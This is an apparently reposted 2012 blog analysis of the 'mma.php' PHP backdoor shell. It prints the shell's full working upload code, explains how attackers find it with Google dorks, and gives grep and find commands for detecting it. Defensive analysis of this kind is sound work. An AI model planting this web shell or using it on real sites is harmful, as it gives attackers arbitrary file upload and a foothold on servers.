2012. 4. 2. 18:38

Analysis on mma.php Backdoor Shell

All right guys, today let’s have a look on a very common backdoor shell today that allows an attacker to upload arbitrary files on the web server. The name of this shell is mma.php and is commonly named or uploaded in the websites I’ve been inspecting for possible backdoor uploads by using the power of Google dorks.

My first encounter with this backdoor shell was like two years ago and I was still a seminarian during that time. I decided to write about it because it is still used by some defacers or attackers. Here is the script:

<?php echo ‘<b><br><br>’.php_uname().’<br></b>’; echo ‘<form action=”" method=”post” enctype=”multipart/form-data” name=”uploader” id=”uploader”>’; echo ‘<input type=”file” name=”file” size=”50″><input name=”_upl” type=”submit” id=”_upl” value=”Upload”></form>’; if( $_POST['_upl'] == “Upload” ) {     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo ‘<b>uplod d0n3 in SAME file // Th3 MMA \\</b><br><br>’; }     else { echo ‘<b>Upload GAGAL !!!</b><br><br>’; } } ?>

And this is how it looks like:

It echos the kernel version because of the php_uname() function. At least we know a php function that can be used to find this backdoor shell. So what makes this backdoor shell risky? Well like I said, it allows the attacker to upload arbitrary files which means, he can host his scripts, upload more backdoor shells, host other php files. Mma.php is one of the backdoor shells that doesn’t use shell_exec to avoidother antivirus or rootkit hunters from detecting it as a suspicious file.

If the file uploading is successful, it echos “uplod d0n3 in SAME file // Th3 MMA \” or else it echos “Upload GAGAL !!!”, thus if Google caches the page, it also allows the attacker to dork these keywords to find this backdoor shell.

With most attackers using the name mma.php, it allows other Google dorkers to search for this file by using inurl:”mma.php” for example. In my recent researches about this backdoor shell, most attackers usually upload it in the /image file directory which some web servers allow directory listing, allowing the attackers to view the backdoor shell easier.

To locate this backdoor shell, you just need to issue these commands in your terminal:

grep -Rn “php_uname *(” /var/www

find / -name mma.php

Be safe guys!

출처 : theprojectxblog.net

Trackback 0 Comment 0